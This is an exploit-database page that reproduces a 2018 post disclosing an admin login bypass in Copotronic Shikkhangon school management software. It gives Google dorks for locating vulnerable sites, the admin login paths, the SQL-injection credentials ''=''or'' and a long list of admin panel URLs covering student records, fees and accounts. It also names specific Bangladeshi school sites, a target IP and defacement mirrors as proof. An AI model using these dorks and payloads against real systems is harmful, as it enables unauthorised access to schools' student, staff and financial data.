Advertisement






Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability

CVE Category Price Severity
CWE-592 Not specified High
Author Risk Exploitation Type Date
Copotronic Shikkhangon Iqbal Hossain Rimon High Remote 2018-07-07
CPE
cpe:cpe:/a:copotronic:shikkhangon-iqbal-hossain-rimon
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070067

Below is a copy:

Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability
#################################################################################################

# Exploit Title : Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/07/2018
# Vendor Homepages : copotronic.com ~ shikkhangon.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592  [ Authentication Bypass Issues ]

#################################################################################################

# Another Exploit Title : Software IT Development By Copotronic InfoSystems Limited 
Shikkhangon CiMS Web Design Md. Iqbal Hossain Rimon Admin Login Bypass Vulnerability

# Description of the Software : Design & Develop By Copotyronic InfoSystem Ltd

Copotronic InfoSystems Ltd. is a Private-Govt. joint venture software company. With a mission to build digital Bangladesh Peoples 
Republic of Bangladesh has taken initiative to promote in IT companies to enable extensive automation services and supports to 
Govt. organizations of Bangladesh to be Digital.COPOTRONIC is a dynamic organization engaged in promoting
software products, services,consultancy, Training using latest technologies to wide spectrum of corporations for over one decade. 
The quality & technology of the products reflect COPOTRONICs ability to produce & deliver world-class software solutions

#################################################################################################

# Google Dorks  : 

intext:''Copyright  2018 Shikkhangon.com. All Right Reserved.''

intext:'' Copotronic InfoSystems Limited. All Right Reserved.''

inurl:''/about_college/'' site:edu.bd Copotronic

# Admin Control Panel Path =>  

/admin
/login

# Exploit : 

Username : '=''or'

Password : '=''or'

# Useable Administration Control Panel URL Links => 

/web/principal_message
/web/notice
/web/notice_list
/web/form_add
/web/form_list
/web/information_list
/web/slide
/web/about
/web/picture_gallery
/web/catagory_list
/admin/teacher_registration
/admin/teacher_list
/academic/class_teacher_assign
/admin/teacher_salary_structure
/admin/staff_registration
/admin/staff_list
/admin/student_registration
/admin/student_list
/admin/class_wise_student_list
/admin/section_wise_student_list
/admin/student_subject_assign
/admin/student_subject_view
/fees/fees_cat
/fees/class_wise_fees_management
/fees/student_fees_generate
/web/slide#
/academic/set_ca_marks
/academic/create_tabulation_sheet
/academic/marit_list
/academic/marit_list_class
/academic/mark_sheet
/academic/transcript
/academic/tabulation_sheet
/academic/tabulation_sheet_subject_wise
/academic/result_view
/accounts/master_head_create
/accounts/master_head_list
/accounts/sub1_head_create
/accounts/sub1_head_list
/accounts/sub2_head_create
/accounts/sub2_head_list
/accounts/sub3_head_create
/accounts/sub3_head_list
/accounts/navigation_head_view
/accounts/debit_voucher_entry
/accounts/debit_voucher_list
/accounts/credit_voucher_entry
/accounts/credit_voucher_list
/web/book_category_list
/web/book_list
/admin/student_sms_notice
/admin/attendance
/academic/show_class_routine
/academic/show_exam_routine
/admin/institute_information
/admin/class_list
/web/class_assign
/academic/set_class_timing
/academic/class_routine
/admin/section_list
/admin/section_assign
/admin/session_list
/admin/shift_list
/admin/subject_list
/admin/subject_assign
/academic/gpa_system
/academic/mark_distribution_system
/academic/term_subject_list
/academic/subject_wise_total_marks_list
/academic/set_exam_time
/academic/set_admit_card_initial
/academic/term_list
/admin/chartof_accounts
/admin/weekly_holiday
/admin/shift_assign

Uploaded Image Path from Admin Panel => /template/upload/principal_image/1_principal_image[RANDOMNUMBER].png  .jpg  .jpeg .gif

#################################################################################################

# Example Sites and Target Vulnerable IP Address 144.217.239.135 => 

gachuaadarshahs.edu.bd/login  => [ Proof of Concept for the Vulnerability ] => zone-h.org/mirror/id/31443090 ~ archive.is/xfYrE

dbmrhs.edu.bd/login  => [ Proof of Concept for the Vulnerability ] =>  archive.is/JhaLN

Vendor Homepage Admin Panel Path => copotronic.com/ims/shikkhangon/shikkhangon_admin/

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum